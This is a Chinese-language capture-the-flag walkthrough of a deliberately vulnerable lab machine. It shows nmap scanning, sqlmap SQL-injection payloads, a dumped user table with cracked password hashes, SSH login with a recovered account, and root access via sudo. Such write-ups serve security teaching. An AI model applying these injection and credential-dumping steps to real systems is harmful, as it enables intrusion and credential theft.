主机发现
使用命令:
netdiscove
┌──(root💀kali)-[~]
└─# netdiscover
得出目标主机ip地址为: 1.1.2.150
端口扫描
使用命令:
nmap -A -v -sS -sV -p- 1.1.2.150
┌──(root💀kali)-[~]
└─# nmap -A -v -sS -sV -p- 1.1.2.150
127 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-07 09:26 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:26
Completed NSE at 09:26, 0.00s elapsed
Initiating NSE at 09:26
Completed NSE at 09:26, 0.00s elapsed
Initiating NSE at 09:26
Completed NSE at 09:26, 0.00s elapsed
Initiating ARP Ping Scan at 09:26
Scanning 1.1.2.150 [1 port]
Completed ARP Ping Scan at 09:26, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:26
Completed Parallel DNS resolution of 1 host. at 09:26, 0.02s elapsed
Initiating SYN Stealth Scan at 09:26
Scanning 1.1.2.150 [65535 ports]
Discovered open port 25/tcp on 1.1.2.150
Discovered open port 22/tcp on 1.1.2.150
Discovered open port 80/tcp on 1.1.2.150
参数说明:
-A:详细扫描目标IP,加载所有脚本,尽可能地全面地探测信息。
-v:显示详细的扫描过程。
-sS:TCP SYN 扫描。
-sV:探测开放。
-p-:扫描全部端口。
扫描得出目标开放了端口:22(SSH服务),25(SMTO服务),80(HTTP服务)。
漏洞挖掘
对页面进行测试发现单引号报错
image.png
使用以下命令爆出表名:
sqlmap -u http://1.1.2.150/index.html\?page\=blog\&title\=Blog\&id\=2 --tables
┌──(root💀kali)-[~]
└─# sqlmap -u http://1.1.2.150/index.html\?page\=blog\&title\=Blog\&id\=2 --tables
Database: ehks
[3 tables]
+---------------------------------------+
| user |
| blog |
| comment |
+---------------------------------------+
使用以下命令爆出字段:
sqlmap -u http://1.1.2.150/index.html\?page\=blog\&title\=Blog\&id\=2 -D ehks --tables -T user --columns
┌──(root💀kali)-[~]
└─# sqlmap -u http://1.1.2.150/index.html\?page\=blog\&title\=Blog\&id\=2 -D ehks --tables -T user --columns
[08:20:15] [INFO] fetching columns for table 'user' in database 'ehks'
Database: ehks
Table: user
[3 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| user_id | int(11) |
| user_name | varchar(20) |
| user_pass | varchar(32) |
+-----------+-------------+
使用以下命令爆出密码等数据:
sqlmap -u http://1.1.2.150/index.html\?page\=blog\&title\=Blog\&id\=2 -D ehks --tables -T user --columns -C user_name,user_pass --dump
___
__H__
___ ___[)]_____ ___ ___ {1.4.11#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:35:50 /2021-04-07/
[08:35:50] [INFO] resuming back-end DBMS 'mysql'
[08:35:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=blog&title=Blog&id=2 AND 1944=1944
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=blog&title=Blog&id=2 AND (SELECT 6440 FROM (SELECT(SLEEP(5)))ntAT)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x7170786a71,0x57704a764f7569574244654e6b65534a547a46427470666a76667a744d44646e424e425548634745,0x716b706b71),NULL,NULL-- -
---
[08:35:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[08:35:50] [INFO] fetching tables for database: 'ehks'
Database: ehks
[3 tables]
+---------+
| user |
| blog |
| comment |
+---------+
[08:35:50] [INFO] fetching columns 'user_name, user_pass' for table 'user' in database 'ehks'
Database: ehks
Table: user
[2 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| user_name | varchar(20) |
| user_pass | varchar(32) |
+-----------+-------------+
[08:35:50] [INFO] fetching entries of column(s) 'user_name,user_pass' for table 'user' in database 'ehks'
[08:35:50] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[08:36:01] [INFO] writing hashes to a temporary file '/tmp/sqlmapl0y6hvjq1955/sqlmaphashes-llvl1jy9.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[08:36:06] [INFO] using hash method 'md5_generic_passwd'
[08:36:06] [INFO] resuming password 'ilike2surf' for hash '02e823a15a392b5aa4ff4ccb9060fa68' for user 'dstevens'
[08:36:06] [INFO] resuming password 'seventysixers' for hash 'b46265f1e7faa3beab09db5c28739380' for user 'achen'
[08:36:06] [INFO] resuming password 'Homesite' for hash '8f4743c04ed8e5f39166a81f26319bb5' for user 'pmoore'
[08:36:06] [INFO] resuming password 'Sue1978' for hash '7c7bc9f465d86b8164686ebb5151a717' for user 'jdurbin'
[08:36:06] [INFO] resuming password 'pacman' for hash '64d1f88b9b276aece4b0edcc25b7a434' for user 'sorzek'
[08:36:06] [INFO] resuming password 'undone1' for hash '9f3eb3087298ff21843cc4e013cf355f' for user 'ghighland'
Database: ehks
Table: user
[6 entries]
+-----------+--------------------------------------------------+
| user_name | user_pass |
+-----------+--------------------------------------------------+
| dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf) |
| achen | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| pmoore | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite) |
| jdurbin | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978) |
| sorzek | 64d1f88b9b276aece4b0edcc25b7a434 (pacman) |
| ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1) |
+-----------+--------------------------------------------------+
[08:36:06] [INFO] table 'ehks.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/1.1.2.150/dump/ehks/user.csv'
[08:36:06] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/1.1.2.150'
[*] ending @ 08:36:06 /2021-04-07/
SSH利用
尝试使用获取到的账号登录SSH,报错!
line 53: Bad configuration option: permitrootlogi
┌──(root💀kali)-[~]
└─# ssh achen:seventysixers@1.1.2.150
/etc/ssh/ssh_config: line 53: Bad configuration option: permitrootlogin
/etc/ssh/ssh_config: terminating, 1 bad configuration options
修改ssh_config文件,禁止root远程登录。
┌──(root💀kali)-[~]
└─# vi /etc/ssh/ssh_config
# PermitRootLogin yes
再次尝试ssh登录失败,报如下错误:
Unable to negotiate with 1.1.2.150 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
┌──(root💀kali)-[~]
└─# ssh dstenvens@1.1.2.150
Unable to negotiate with 1.1.2.150 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
┌──(root💀kali)-[~]
└─# ssh achen@1.1.2.150 255 ⨯
Unable to negotiate with 1.1.2.150 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
添加.ssh/config文件并修改其内容:
┌──(root💀kali)-[~]
└─# vi .ssh/config
Host 1.1.2.150
KexAlgorithms +diffie-hellman-group1-sha1
# 注意:Host 为CTF4服务器的ip地址
# +diffie前有空格
再次尝试使用获取到的账号登录SSH,成功登录
┌──(root💀kali)-[~]
└─# ssh achen@1.1.2.150
The authenticity of host '1.1.2.150 (1.1.2.150)' can't be established.
RSA key fingerprint is SHA256:NDWh6/414mOsW4P7K6ICc5R67PrX87ADMFUx9DK9ftk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '1.1.2.150' (RSA) to the list of known hosts.
BSD SSH 4.1
achen@1.1.2.150's password:
Last login: Tue Mar 10 12:45:06 2009
[achen@ctf4 ~]$ whoami
achen
权限提升
使用sudo命令进行提权
[achen@ctf4 ~]$ sudo su
[root@ctf4 achen]#
[root@ctf4 achen]# netstat -pantu | grep 22
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 2422/sendmail: acce
tcp 0 0 :::22 :::* LISTEN 2283/sshd
tcp 0 0 ::ffff:1.1.2.150:22 ::ffff:1.1.2.129:47108 ESTABLISHED 3881/sshd: achen [p
使用sudo -l查看当前用户权限
[root@ctf4 achen]# sudo -l
User achen may run the following commands on this host:
(ALL) ALL
成功提权
